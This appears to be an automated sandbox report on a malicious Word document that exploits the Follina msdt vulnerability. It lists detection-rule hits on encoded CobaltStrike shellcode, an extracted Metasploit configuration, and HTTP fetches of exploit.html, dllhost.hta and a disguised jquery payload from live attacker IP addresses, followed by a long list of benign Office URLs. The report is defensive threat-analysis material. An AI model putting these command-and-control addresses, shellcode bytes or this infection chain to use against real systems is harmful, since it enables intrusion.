00000019.00000003.500854607.0000000006B80000.00000004.00000800.00020000.00000000.sdmp	Cobaltbaltstrike_Payload_Encoded	Detects CobaltStrike payloads	Avast Threat Intel Team	0x1008:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x3f10:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x6e18:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x9d20:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0xcc28:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0xfb30:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x12a38:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x15950:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x18868:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x1b780:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x1e698:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x215b0:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x244d8:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x27400:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x2a328:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x2d250:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x30178:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x330a0:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x35fd8:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x38f10:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x3be48:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117
00000019.00000003.498808453.0000000006D3A000.00000004.00000800.00020000.00000000.sdmp	Cobaltbaltstrike_Payload_Encoded	Detects CobaltStrike payloads	Avast Threat Intel Team	0x1340:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x4528:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x7710:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0xa908:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0xdb10:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x10d18:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x13f20:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x17138:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x1a360:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x1d588:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x207b0:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x239d8:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x26c10:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x29e48:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x2d090:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x302d8:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x33520:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x36768:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x399b0:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x3cc08:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x3fe60:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117
Process Memory Space: msdt.exe PID: 7052	SUSP_PS1_Msdt_Execution_May22	Detects suspicious calls of msdt.exe as seen in CVE-2022-30190 / Follina exploitation	Nasreddine Bencherchali, Christian Burkard	0x15732:$a: PCWDiagnostic 0x33ef6:$a: PCWDiagnostic 0x5be2:$sa1: msdt.exe 0x8b98:$sa1: msdt.exe 0x1713c:$sa1: msdt.exe 0x23b20:$sa1: msdt.exe 0x26ad6:$sa1: msdt.exe 0x2d3dc:$sa1: msdt.exe 0x30392:$sa1: msdt.exe 0x33ec3:$sa1: msdt.exe 0x33ee0:$sa1: msdt.exe 0x340ec:$sa1: msdt.exe 0x37d6c:$sa1: msdt.exe 0x37d74:$sa1: msdt.exe 0x37d7c:$sa1: msdt.exe 0x3a540:$sa1: msdt.exe 0x3e689:$sa1: msdt.exe 0x33f49:$sb3: IT_BrowseForFile=
Process Memory Space: mshta.exe PID: 5852	Cobaltbaltstrike_Payload_Encoded	Detects CobaltStrike payloads	Avast Threat Intel Team	0x13cd:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x1cfc:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x8f7d:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0xb309:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0xbad0:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x13f7b:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x16888:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x1ee1f:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x1faa3:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x24fab:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x2bf06:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x2dc50:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x31455:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x32c23:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x371c5:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x3b700:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x3ce8c:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x45afa:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x46a3d:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x48e17:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x4c3bb:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117
Click to see the 170 entries

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Multi AV Scanner detection for submitted file

Source: V3g2Pfu707.docx	Virustotal: Detection: 33%			Perma Link
Source: V3g2Pfu707.docx	ReversingLabs: Detection: 29%

Source: 0000001E.00000002.556428060.0000000002CE0000.00000040.00000400.00020000.00000000.sdmp

Malware Configuration Extractor: Metasploit {"Headers": "Accept: */*\r\nAccept-Language: en-US,en;q=0.5\r\nReferer: https://www.microsoft.com/\r\nAccept-Encoding: gzip, deflate\r\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_07_00) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11\r\n", "Type": "Metasploit Download", "URL": "http://106.55.17.200/jquery-3.3.1.slim.min.js"}

Exploits

Yara detected Microsoft Office Exploit Follina CVE-2022-30190

Source: Yara match	File source: dump.pcap, type: PCAP
Source: Yara match	File source: 00000009.00000002.556693839.0000000000F50000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.585006641.0000000003700000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.582026384.0000000001080000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\exploit[1].htm, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\164F6553.htm, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\BE8733D.htm, type: DROPPED

Detected suspicious Microsoft Office reference URL

Source: document.xml.rels

Extracted files from sample: http://101.33.231.81:62563/exploit.html!

Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE

File opened: C:\Windows\SysWOW64\MSVCR100.dll

Jump to behavior

Software Vulnerabilities

Document exploit detected (process start blacklist hit)

Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE

Process created: C:\Windows\SysWOW64\msdt.exe

Source: global traffic

TCP traffic: 192.168.2.3:49746 -> 101.33.231.81:62563

Source: global traffic

TCP traffic: 192.168.2.3:49749 -> 101.33.231.81:62563

Source: winword.exe

Memory has grown: Private usage: 0MB later: 95MB

Networking

Uses known network protocols on non-standard ports

Source: unknown	Network traffic detected: HTTP traffic on port 49746 -> 62563
Source: unknown	Network traffic detected: HTTP traffic on port 62563 -> 49746
Source: unknown	Network traffic detected: HTTP traffic on port 49747 -> 62563
Source: unknown	Network traffic detected: HTTP traffic on port 62563 -> 49747
Source: unknown	Network traffic detected: HTTP traffic on port 49748 -> 62563
Source: unknown	Network traffic detected: HTTP traffic on port 62563 -> 49748
Source: unknown	Network traffic detected: HTTP traffic on port 49749 -> 62563
Source: unknown	Network traffic detected: HTTP traffic on port 62563 -> 49749
Source: unknown	Network traffic detected: HTTP traffic on port 49750 -> 62563
Source: unknown	Network traffic detected: HTTP traffic on port 62563 -> 49750
Source: unknown	Network traffic detected: HTTP traffic on port 49751 -> 62563
Source: unknown	Network traffic detected: HTTP traffic on port 62563 -> 49751
Source: unknown	Network traffic detected: HTTP traffic on port 49752 -> 62563
Source: unknown	Network traffic detected: HTTP traffic on port 62563 -> 49752
Source: unknown	Network traffic detected: HTTP traffic on port 49753 -> 62563
Source: unknown	Network traffic detected: HTTP traffic on port 62563 -> 49753
Source: unknown	Network traffic detected: HTTP traffic on port 49754 -> 62563
Source: unknown	Network traffic detected: HTTP traffic on port 62563 -> 49754
Source: unknown	Network traffic detected: HTTP traffic on port 49755 -> 62563
Source: unknown	Network traffic detected: HTTP traffic on port 62563 -> 49755
Source: unknown	Network traffic detected: HTTP traffic on port 49756 -> 62563
Source: unknown	Network traffic detected: HTTP traffic on port 62563 -> 49756
Source: unknown	Network traffic detected: HTTP traffic on port 49757 -> 62563
Source: unknown	Network traffic detected: HTTP traffic on port 62563 -> 49757
Source: unknown	Network traffic detected: HTTP traffic on port 49758 -> 62563
Source: unknown	Network traffic detected: HTTP traffic on port 62563 -> 49758
Source: unknown	Network traffic detected: HTTP traffic on port 49781 -> 61256
Source: unknown	Network traffic detected: HTTP traffic on port 61256 -> 49781

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: http://106.55.17.200/jquery-3.3.1.slim.min.js

Source: Joe Sandbox View

ASN Name: TENCENT-NET-AP-CNTencentBuildingKejizhongyiAvenueCN TENCENT-NET-AP-CNTencentBuildingKejizhongyiAvenueCN

Source: global traffic	HTTP traffic detected: GET /exploit.html HTTP/1.1Accept: /User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; ms-office; MSOffice 16)Accept-Encoding: gzip, deflateHost: 101.33.231.81:62563Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /exploit.html HTTP/1.1Accept: /User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; ms-office; MSOffice 16)Accept-Encoding: gzip, deflateHost: 101.33.231.81:62563If-Modified-Since: Tue, 14 Jun 2022 15:37:10 GMT; length=5737Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /dllhost.hta HTTP/1.1Accept: /Accept-Language: en-USAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 159.75.135.162:61256Connection: Keep-Alive

Source: global traffic	TCP traffic: 192.168.2.3:49746 -> 101.33.231.81:62563
Source: global traffic	TCP traffic: 192.168.2.3:49781 -> 159.75.135.162:61256

Source: unknown	TCP traffic detected without corresponding DNS query: 101.33.231.81
Source: unknown	TCP traffic detected without corresponding DNS query: 101.33.231.81
Source: unknown	TCP traffic detected without corresponding DNS query: 101.33.231.81
Source: unknown	TCP traffic detected without corresponding DNS query: 101.33.231.81
Source: unknown	TCP traffic detected without corresponding DNS query: 101.33.231.81
Source: unknown	TCP traffic detected without corresponding DNS query: 101.33.231.81
Source: unknown	TCP traffic detected without corresponding DNS query: 101.33.231.81
Source: unknown	TCP traffic detected without corresponding DNS query: 101.33.231.81
Source: unknown	TCP traffic detected without corresponding DNS query: 101.33.231.81
Source: unknown	TCP traffic detected without corresponding DNS query: 101.33.231.81
Source: unknown	TCP traffic detected without corresponding DNS query: 101.33.231.81
Source: unknown	TCP traffic detected without corresponding DNS query: 101.33.231.81
Source: unknown	TCP traffic detected without corresponding DNS query: 101.33.231.81
Source: unknown	TCP traffic detected without corresponding DNS query: 101.33.231.81
Source: unknown	TCP traffic detected without corresponding DNS query: 101.33.231.81
Source: unknown	TCP traffic detected without corresponding DNS query: 101.33.231.81
Source: unknown	TCP traffic detected without corresponding DNS query: 101.33.231.81
Source: unknown	TCP traffic detected without corresponding DNS query: 101.33.231.81
Source: unknown	TCP traffic detected without corresponding DNS query: 101.33.231.81
Source: unknown	TCP traffic detected without corresponding DNS query: 101.33.231.81
Source: unknown	TCP traffic detected without corresponding DNS query: 101.33.231.81
Source: unknown	TCP traffic detected without corresponding DNS query: 101.33.231.81
Source: unknown	TCP traffic detected without corresponding DNS query: 101.33.231.81
Source: unknown	TCP traffic detected without corresponding DNS query: 101.33.231.81
Source: unknown	TCP traffic detected without corresponding DNS query: 101.33.231.81
Source: unknown	TCP traffic detected without corresponding DNS query: 101.33.231.81
Source: unknown	TCP traffic detected without corresponding DNS query: 101.33.231.81
Source: unknown	TCP traffic detected without corresponding DNS query: 101.33.231.81
Source: unknown	TCP traffic detected without corresponding DNS query: 101.33.231.81
Source: unknown	TCP traffic detected without corresponding DNS query: 101.33.231.81
Source: unknown	TCP traffic detected without corresponding DNS query: 101.33.231.81
Source: unknown	TCP traffic detected without corresponding DNS query: 101.33.231.81
Source: unknown	TCP traffic detected without corresponding DNS query: 101.33.231.81
Source: unknown	TCP traffic detected without corresponding DNS query: 101.33.231.81
Source: unknown	TCP traffic detected without corresponding DNS query: 101.33.231.81
Source: unknown	TCP traffic detected without corresponding DNS query: 101.33.231.81
Source: unknown	TCP traffic detected without corresponding DNS query: 101.33.231.81
Source: unknown	TCP traffic detected without corresponding DNS query: 101.33.231.81
Source: unknown	TCP traffic detected without corresponding DNS query: 101.33.231.81
Source: unknown	TCP traffic detected without corresponding DNS query: 101.33.231.81
Source: unknown	TCP traffic detected without corresponding DNS query: 101.33.231.81
Source: unknown	TCP traffic detected without corresponding DNS query: 101.33.231.81
Source: unknown	TCP traffic detected without corresponding DNS query: 101.33.231.81
Source: unknown	TCP traffic detected without corresponding DNS query: 101.33.231.81
Source: unknown	TCP traffic detected without corresponding DNS query: 101.33.231.81
Source: unknown	TCP traffic detected without corresponding DNS query: 101.33.231.81
Source: unknown	TCP traffic detected without corresponding DNS query: 101.33.231.81
Source: unknown	TCP traffic detected without corresponding DNS query: 101.33.231.81
Source: unknown	TCP traffic detected without corresponding DNS query: 101.33.231.81
Source: unknown	TCP traffic detected without corresponding DNS query: 101.33.231.81

Source: ~WRS{9C7F191B-1B19-4530-878D-79768D2CF994}.tmp.0.dr	String found in binary or memory: http://101.33.231.81:62563/exploit.html
Source: mshta.exe, 00000019.00000002.559346713.0000000000A02000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000019.00000002.559444903.0000000000A6A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://159.75.135.162:61256/dllhost.hta
Source: mshta.exe, 00000019.00000002.558415681.0000000000860000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://159.75.135.162:61256/dllhost.htaC:
Source: mshta.exe, 00000019.00000002.559444903.0000000000A6A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://159.75.135.162:61256/dllhost.htaET4.C:
Source: mshta.exe, 00000019.00000002.559370717.0000000000A1C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://159.75.135.162:61256/dllhost.htaV
Source: mshta.exe, 00000019.00000002.559370717.0000000000A1C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://159.75.135.162:61256/dllhost.htaY
Source: mshta.exe, 00000019.00000002.559370717.0000000000A1C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://159.75.135.162:61256/dllhost.htag
Source: mshta.exe, 00000019.00000002.559370717.0000000000A1C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://159.75.135.162:61256/dllhost.htaindowsINetCookiesF&
Source: mshta.exe, 00000019.00000002.559370717.0000000000A1C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://159.75.135.162:61256/dllhost.htanation
Source: mshta.exe, 00000019.00000002.559463077.0000000000A77000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://159.75.135.162:61256/dllhost.htaocess
Source: mshta.exe, 00000019.00000002.561330610.0000000000D00000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://159.75.135.162:61256/dllhost.htata
Source: 898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.dr	String found in binary or memory: http://b.c2r.ts.cdn.office.net/pr
Source: rundll32.exe, 0000001E.00000002.557013921.0000000002E3B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: rundll32.exe, 0000001E.00000002.557013921.0000000002E3B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
Source: rundll32.exe, 0000001E.00000002.557013921.0000000002E3B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab3
Source: 898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.dr	String found in binary or memory: http://f.c2r.ts.cdn.office.net/pr
Source: 898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.dr	String found in binary or memory: http://olkflt.edog.officeapps.live.com/olkflt/outlookflighting.svc/api/glides
Source: 898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.dr	String found in binary or memory: http://weather.service.msn.com/data.aspx
Source: rundll32.exe, 0000001E.00000002.556934937.0000000002E27000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://106.55.17.200/
Source: rundll32.exe, 0000001E.00000002.556713488.0000000002DDA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://106.55.17.200:62002/
Source: rundll32.exe, 0000001E.00000002.556915406.0000000002E1A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000001E.00000002.556560356.0000000002D6B000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000001E.00000002.556713488.0000000002DDA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://106.55.17.200:62002/jquery-3.3.1.slim.min.js
Source: rundll32.exe, 0000001E.00000002.556915406.0000000002E1A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://106.55.17.200:62002/jquery-3.3.1.slim.min.js9
Source: 898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.dr	String found in binary or memory: https://addinsinstallation.store.office.com/app/acquisitionlogging
Source: 898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.dr	String found in binary or memory: https://addinsinstallation.store.office.com/app/download
Source: 898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.dr	String found in binary or memory: https://addinsinstallation.store.office.com/appinstall/authenticated
Source: 898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.dr	String found in binary or memory: https://addinsinstallation.store.office.com/appinstall/preinstalled
Source: 898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.dr	String found in binary or memory: https://addinsinstallation.store.office.com/appinstall/unauthenticated
Source: 898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.dr	String found in binary or memory: https://addinsinstallation.store.office.com/orgid/appinstall/authenticated
Source: 898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.dr	String found in binary or memory: https://addinslicensing.store.office.com/apps/remove
Source: 898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.dr	String found in binary or memory: https://addinslicensing.store.office.com/commerce/query
Source: 898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.dr	String found in binary or memory: https://addinslicensing.store.office.com/entitlement/query
Source: 898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.dr	String found in binary or memory: https://addinslicensing.store.office.com/orgid/apps/remove
Source: 898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.dr	String found in binary or memory: https://addinslicensing.store.office.com/orgid/entitlement/query
Source: 898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.dr	String found in binary or memory: https://analysis.windows.net/powerbi/api
Source: 898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.dr	String found in binary or memory: https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: 898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.dr	String found in binary or memory: https://api.aadrm.com
Source: 898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.dr	String found in binary or memory: https://api.aadrm.com/
Source: 898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.dr	String found in binary or memory: https://api.addins.omex.office.net/appinfo/query
Source: 898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.dr	String found in binary or memory: https://api.addins.omex.office.net/appstate/query
Source: 898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.dr	String found in binary or memory: https://api.addins.store.office.com/addinstemplate
Source: 898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.dr	String found in binary or memory: https://api.addins.store.office.com/app/query
Source: 898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.dr	String found in binary or memory: https://api.addins.store.officeppe.com/addinstemplate
Source: 898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.dr	String found in binary or memory: https://api.cortana.ai
Source: 898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.dr	String found in binary or memory: https://api.diagnostics.office.com
Source: 898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.dr	String found in binary or memory: https://api.diagnosticssdf.office.com
Source: 898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.dr	String found in binary or memory: https://api.diagnosticssdf.office.com/v2/feedback
Source: 898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.dr	String found in binary or memory: https://api.diagnosticssdf.office.com/v2/file
Source: 898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.dr	String found in binary or memory: https://api.microsoftstream.com/api/
Source: 898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.dr	String found in binary or memory: https://api.office.net
Source: 898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.dr	String found in binary or memory: https://api.onedrive.com
Source: 898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.dr	String found in binary or memory: https://api.powerbi.com/beta/myorg/imports
Source: 898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.dr	String found in binary or memory: https://api.powerbi.com/v1.0/myorg/datasets
Source: 898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.dr	String found in binary or memory: https://api.powerbi.com/v1.0/myorg/groups
Source: 898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.dr	String found in binary or memory: https://apis.live.net/v5.0/
Source: 898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.dr	String found in binary or memory: https://arc.msn.com/v4/api/selection
Source: 898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.dr	String found in binary or memory: https://asgsmsproxyapi.azurewebsites.net/
Source: 898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.dr	String found in binary or memory: https://augloop.office.com
Source: 898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.dr	String found in binary or memory: https://augloop.office.com/v2
Source: 898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.dr	String found in binary or memory: https://augloop.office.com;https://augloop-int.officeppe.com;https://augloop-dogfood.officeppe.com;h
Source: 898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.dr	String found in binary or memory: https://autodiscover-s.outlook.com/
Source: 898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.dr	String found in binary or memory: https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml
Source: 898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.dr	String found in binary or memory: https://cdn.entity.
Source: 898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.dr	String found in binary or memory: https://cdn.odc.officeapps.live.com/odc/stat/images/OneDriveUpsell.png
Source: 898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.dr	String found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSignUpUpsell
Source: 898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.dr	String found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSyncClientUpsell
Source: 898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.dr	String found in binary or memory: https://client-office365-tas.msedge.net/ab
Source: 898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.dr	String found in binary or memory: https://clients.config.office.net/
Source: 898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.dr	String found in binary or memory: https://clients.config.office.net/c2r/v1.0/InteractiveInstallation
Source: 898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.dr	String found in binary or memory: https://clients.config.office.net/user/v1.0/android/policies
Source: 898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.dr	String found in binary or memory: https://clients.config.office.net/user/v1.0/ios
Source: 898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.dr	String found in binary or memory: https://clients.config.office.net/user/v1.0/mac
Source: 898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.dr	String found in binary or memory: https://clients.config.office.net/user/v1.0/tenantassociationkey
Source: 898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.dr	String found in binary or memory: https://cloudfiles.onenote.com/upload.aspx
Source: 898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.dr	String found in binary or memory: https://config.edge.skype.com
Source: 898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.dr	String found in binary or memory: https://config.edge.skype.com/config/v1/Office
Source: 898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.dr	String found in binary or memory: https://config.edge.skype.com/config/v2/Office
Source: 898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.dr	String found in binary or memory: https://cortana.ai
Source: 898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.dr	String found in binary or memory: https://cortana.ai/api
Source: 898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.dr	String found in binary or memory: https://cr.office.com
Source: 898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.dr	String found in binary or memory: https://dataservice.o365filtering.com
Source: 898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.dr	String found in binary or memory: https://dataservice.o365filtering.com/
